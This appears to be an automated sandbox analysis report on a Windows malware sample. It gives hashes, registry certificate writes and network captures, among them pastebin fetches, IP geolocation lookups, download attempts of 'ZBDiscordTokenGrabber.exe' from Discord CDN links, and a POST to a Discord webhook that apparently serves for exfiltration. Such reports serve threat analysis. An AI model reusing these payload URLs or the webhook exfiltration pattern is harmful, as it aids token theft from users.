Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
09-09-2024 02:50
Behavioral task
behavioral1
Sample
d58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
d58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
d58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exe
-
Size
114KB
-
MD5
d58a15cab40574fad4928aa7eb6de4fe
-
SHA1
4c1096ad6339c4a2da77429c6418096e02cc0d8f
-
SHA256
75f64ca84cb9d2ebe9dbe752030dd74607d173f9be5ca50d73e86dfb0f715fed
-
SHA512
d4de46c25eb12d1c851c5d78a826f5823bda8eafe056cc4fa31ba449df6705b83dc0956bfed8ef0c060cc54ff61f864a6a55c3ca7d563600dc4f254c1271ccfd
-
SSDEEP
3072:/ZkAVxSgIk8GO8njNAcf4ixlWENI6CZHZ:/yySDk8GOkjWPixlWEBCZHZ
Malware Config
Signatures
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 2 pastebin.com 4 pastebin.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 icanhazip.com -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 d58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e4030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 d58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec5290f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae474040000000100000010000000acb694a59c17e0d791529bb19706a6e420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 d58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 d58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e d58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e d58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 d58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exe
Processes
Network
-
Remote address:8.8.8.8:53Requestpastebin.comIN AResponsepastebin.comIN A104.20.4.235pastebin.comIN A104.20.3.235pastebin.comIN A172.67.19.24
-
Remote address:104.20.4.235:443RequestGET /raw/810VyuUQ HTTP/1.1
User-Agent: Mozilla/5.0
Host: pastebin.com
ResponseHTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: MISS
Last-Modified: Mon, 09 Sep 2024 02:50:22 GMT
Server: cloudflare
CF-RAY: 8c03ded47f5cd1fa-LHR
-
Remote address:8.8.8.8:53Requestc.pki.googIN AResponsec.pki.googIN CNAMEpki-goog.l.google.compki-goog.l.google.comIN A142.250.179.227
-
Remote address:142.250.179.227:80RequestGET /r/gsr1.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: c.pki.goog
ResponseHTTP/1.1 200 OK
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 1739
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Mon, 09 Sep 2024 02:19:38 GMT
Expires: Mon, 09 Sep 2024 03:09:38 GMT
Cache-Control: public, max-age=3000
Age: 1844
Last-Modified: Mon, 08 Jul 2024 07:38:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
-
Remote address:142.250.179.227:80RequestGET /r/r4.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: c.pki.goog
ResponseHTTP/1.1 200 OK
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 436
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Mon, 09 Sep 2024 02:27:34 GMT
Expires: Mon, 09 Sep 2024 03:17:34 GMT
Cache-Control: public, max-age=3000
Age: 1368
Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
-
Remote address:8.8.8.8:53Requesticanhazip.comIN AResponseicanhazip.comIN A104.16.185.241icanhazip.comIN A104.16.184.241
-
Remote address:104.16.185.241:80RequestGET / HTTP/1.1
User-Agent: Mozilla/5.0
Host: icanhazip.com
ResponseHTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 14
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
Set-Cookie: __cf_bm=h6_rgnbdU4gSHUWZAkNckEGB5B.iZZCXk0PjHL91NtI-1725850223-1.0.1.1-BXw_jrG5sdgt7cTvOhXPn0gIacsoL7379NsjaPsNIYUs_yb9.wMLm0TpzS0Jwxr.TMtGj1ZncwnOS4nOlBjeHg; path=/; expires=Mon, 09-Sep-24 03:20:23 GMT; domain=.icanhazip.com; HttpOnly
Server: cloudflare
CF-RAY: 8c03ded69bce773b-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Requestwww.geodatatool.comIN AResponsewww.geodatatool.comIN A158.69.65.151
-
Remote address:158.69.65.151:443RequestGET / HTTP/1.1
User-Agent: Mozilla/5.0
Host: www.geodatatool.com
ResponseHTTP/1.1 200 OK
Date: Mon, 09 Sep 2024 02:51:56 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 18912
Connection: keep-alive
Vary: Accept-Encoding
-
Remote address:8.8.8.8:53Requestcdn.discordapp.comIN AResponsecdn.discordapp.comIN A162.159.130.233cdn.discordapp.comIN A162.159.134.233cdn.discordapp.comIN A162.159.133.233cdn.discordapp.comIN A162.159.135.233cdn.discordapp.comIN A162.159.129.233
-
GEThttps://cdn.discordapp.com/attachments/755908849738842196/755910043265663157/savedecrypter.exed58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exeRemote address:162.159.130.233:443RequestGET /attachments/755908849738842196/755910043265663157/savedecrypter.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: cdn.discordapp.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=.h7gcTV1W5GOSum.hEWzMLjw_VJ3AIL1msgnLyt_UQ4-1725850226-1.0.1.1-xuHNx5FzUzrQPpYTgkYZ0Bz5rlUwh0BUzt_9kedB59oSUyxYDv0f7lqLX__QW5sVxiXVYvaapoXCsv9aD1LAfA; path=/; expires=Mon, 09-Sep-24 03:20:26 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uHFDNPL9EOhca8r0w9aibe1477ZEk6O1BN0o%2FeA3w7KRHmaRRHySJ6nuryrgcD0nOa20pbYpuMxlfU5s7MIyRuI9FRR77gvjpE7nlbfKeP82SVQMkbeNn1aCVzyvXbUQUuQ9Vw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Set-Cookie: _cfuvid=h.Nqup7dZKTAhkR7yu.ebv7OrnjMFgE5jmG.Tl.MgQc-1725850226376-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8c03deeacbec769e-LHR
alt-svc: h3=":443"; ma=86400
-
GEThttps://cdn.discordapp.com/attachments/755908849738842196/755909095772389386/ZBDiscordTokenGrabber.exed58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exeRemote address:162.159.130.233:443RequestGET /attachments/755908849738842196/755909095772389386/ZBDiscordTokenGrabber.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: cdn.discordapp.com
Connection: Keep-Alive
Cookie: __cf_bm=.h7gcTV1W5GOSum.hEWzMLjw_VJ3AIL1msgnLyt_UQ4-1725850226-1.0.1.1-xuHNx5FzUzrQPpYTgkYZ0Bz5rlUwh0BUzt_9kedB59oSUyxYDv0f7lqLX__QW5sVxiXVYvaapoXCsv9aD1LAfA; _cfuvid=h.Nqup7dZKTAhkR7yu.ebv7OrnjMFgE5jmG.Tl.MgQc-1725850226376-0.0.1.1-604800000
ResponseHTTP/1.1 404 Not Found
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UCw3Iw2xY9C%2F9AzjF5rCRqRu3HfeaLinRurN3RtekrdRkizrxtfkb0H2KgVGaFL8nbNMISHL%2BBrIFFTtWq%2F0BCKJedLMPryTyHnwdYnolUC68AWtqdzQFLTAHl60xFWwwYIOwA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 8c03deeb2c07769e-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Requestdiscordapp.comIN AResponsediscordapp.comIN A162.159.134.233discordapp.comIN A162.159.133.233discordapp.comIN A162.159.135.233discordapp.comIN A162.159.129.233discordapp.comIN A162.159.130.233
-
POSThttps://discordapp.com/api/webhooks/760580485616369734/e1QxCJz2FnJj53U5oR7ZbEgOzQKcCUaVd0hMf6FNwe9la9GAEOAGmv-H1d9DzVC5ZjPud58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exeRemote address:162.159.134.233:443RequestPOST /api/webhooks/760580485616369734/e1QxCJz2FnJj53U5oR7ZbEgOzQKcCUaVd0hMf6FNwe9la9GAEOAGmv-H1d9DzVC5ZjPu HTTP/1.1
Accept: application/json
Content-Type: application/json
User-Agent: Mozilla/5.0
Host: discordapp.com
Content-Length: 500
Cache-Control: no-cache
ResponseHTTP/1.1 404 Not Found
Content-Type: application/json
Content-Length: 45
Connection: keep-alive
set-cookie: __dcfduid=4488b4e66e5611ef89867e2489fb2ca8; Expires=Sat, 08-Sep-2029 02:50:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1725850228
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OhWXMSqp4PkDBj5pEvCyrJib5pNxU2HsyDL7LS7OLStRCvtPYFC%2BYL1jc3rBP%2BmzZcrVEA%2FmfgHj7XRwL45BFGdzW9ahueIPHY4X0R75thI7MyFbXRQsK6YYxu85BsQd"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: __sdcfduid=4488b4e66e5611ef89867e2489fb2ca8f6177168b647c9006e5a20254f565cb7e63dd3297a8497f8d0ee9efe13ddfdd0; Expires=Sat, 08-Sep-2029 02:50:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cf_bm=TLXY1Ku.8Dto4GjObmdHJvHMaGmzXv1QBbu2XG_XuPE-1725850226-1.0.1.1-vSGzGTOpVGDfPuhSZW6FYoIc9b6XgsV63OSaI9ofUz5oqlqGqDYiEnpbaF2PWypTdzVwkFzMPAMXLg1bDohqmg; path=/; expires=Mon, 09-Sep-24 03:20:26 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Set-Cookie: __cfruid=d57337332c3fdafbfaad846009b36e35c3fe3d81-1725850226; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=1Q5tErr4dL8cH0tRZciE5Ac5w8KXyYb7XYOPQdp1vfI-1725850226829-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8c03deecefac9480-LHR
-
104.20.4.235:443https://pastebin.com/raw/810VyuUQtls, httpd58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exe801 B 4.2kB 9 10
HTTP Request
GET https://pastebin.com/raw/810VyuUQHTTP Response
200 -
142.250.179.227:80http://c.pki.goog/r/r4.crlhttpd58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exe606 B 5.0kB 8 6
HTTP Request
GET http://c.pki.goog/r/gsr1.crlHTTP Response
200HTTP Request
GET http://c.pki.goog/r/r4.crlHTTP Response
200 -
294 B 668 B 5 3
HTTP Request
GET http://icanhazip.com/HTTP Response
200 -
158.69.65.151:443https://www.geodatatool.com/tls, httpd58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exe1.4kB 24.9kB 17 23
HTTP Request
GET https://www.geodatatool.com/HTTP Response
200 -
162.159.130.233:443https://cdn.discordapp.com/attachments/755908849738842196/755909095772389386/ZBDiscordTokenGrabber.exetls, httpd58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exe1.9kB 5.2kB 11 9
HTTP Request
GET https://cdn.discordapp.com/attachments/755908849738842196/755910043265663157/savedecrypter.exeHTTP Response
404HTTP Request
GET https://cdn.discordapp.com/attachments/755908849738842196/755909095772389386/ZBDiscordTokenGrabber.exeHTTP Response
404 -
162.159.134.233:443https://discordapp.com/api/webhooks/760580485616369734/e1QxCJz2FnJj53U5oR7ZbEgOzQKcCUaVd0hMf6FNwe9la9GAEOAGmv-H1d9DzVC5ZjPutls, httpd58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exe1.4kB 5.2kB 8 10
HTTP Request
